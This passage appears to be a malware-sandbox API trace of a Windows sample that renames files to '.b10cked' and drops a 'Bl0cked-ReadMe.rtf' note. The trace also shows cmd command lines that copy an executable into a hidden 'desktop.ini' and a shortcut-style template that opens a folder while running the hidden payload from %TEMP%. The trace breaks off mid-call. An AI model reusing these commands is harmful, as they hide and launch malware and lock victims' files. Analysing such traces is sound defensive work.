SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3478 [0151.637] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3960 [0151.695] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3960 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.696] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0151.712] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.712] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0151.713] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0151.713] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, 
lpOverlapped=0x0) returned 1 [0151.713] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0151.713] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0151.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0151.718] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3960 [0151.719] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0151.719] CloseHandle (hObject=0x114) returned 1 [0151.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX") returned 0x3c [0151.720] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.721] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xce4, dwThreadId=0xa10)) returned 1 [0151.727] CloseHandle (hObject=0x110) returned 1 [0151.727] CloseHandle (hObject=0x114) returned 1 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.727] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount2=32) returned 3 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", 
cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0151.727] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0151.727] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0151.727] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0151.727] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0151.727] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.728] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0151.728] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0151.728] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd1c, dwThreadId=0xc2c)) returned 1 [0151.734] CloseHandle (hObject=0x110) returned 1 [0151.734] CloseHandle (hObject=0x114) returned 1 [0151.734] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf")) returned 0xffffffff [0151.734] GetLastError () returned 0x2 [0151.734] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0151.737] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf")) returned 0x2020 [0151.737] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.737] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0151.737] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0151.737] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.737] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0151.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0151.737] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0151.737] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.738] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0151.738] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0151.738] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036") returned 0x2f [0151.739] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x17a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x17a [0151.739] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0151.739] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" 
& del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc54, dwThreadId=0xc78)) returned 1 [0151.853] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0152.672] CloseHandle (hObject=0x114) returned 1 [0152.672] CloseHandle (hObject=0x110) returned 1 [0152.672] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0152.672] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0152.673] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0152.673] GetTickCount () returned 0x2f150 [0152.673] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20946195906) returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0152.673] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"1036\" & type \"1036\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"1036\" & TYPE \"1036\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" 
&& \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0152.673] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"1036\" & type \"1036\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"1036\" & TYPE \"1036\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0152.673] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0152.673] CoInitialize (pvReserved=0x0) returned 0x0 [0152.673] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 